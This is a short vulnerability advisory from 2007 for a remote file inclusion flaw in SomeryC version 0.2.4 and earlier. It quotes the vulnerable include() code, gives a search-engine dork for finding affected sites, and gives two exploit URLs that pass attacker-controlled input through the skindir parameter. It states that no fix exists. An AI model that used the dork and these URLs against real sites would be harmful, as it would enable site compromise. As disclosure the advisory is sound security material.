SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability

2007-08-27 00:00:00

### SomeryC <= v0.2.4 Remote File Include ###

#Vendor: http://someryc.mostpopularcomic.com
#download http://someryc.mostpopularcomic.com/sC024.zip

#found by: Katatafish ([email protected])

#d0rk: "powered by someryc"

#vuln-code(/admin/system/include.php):

if ($start) {
....
include("$skindir/header.php");
}
....
include("$skindir/footer.php");

#exploit:

http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.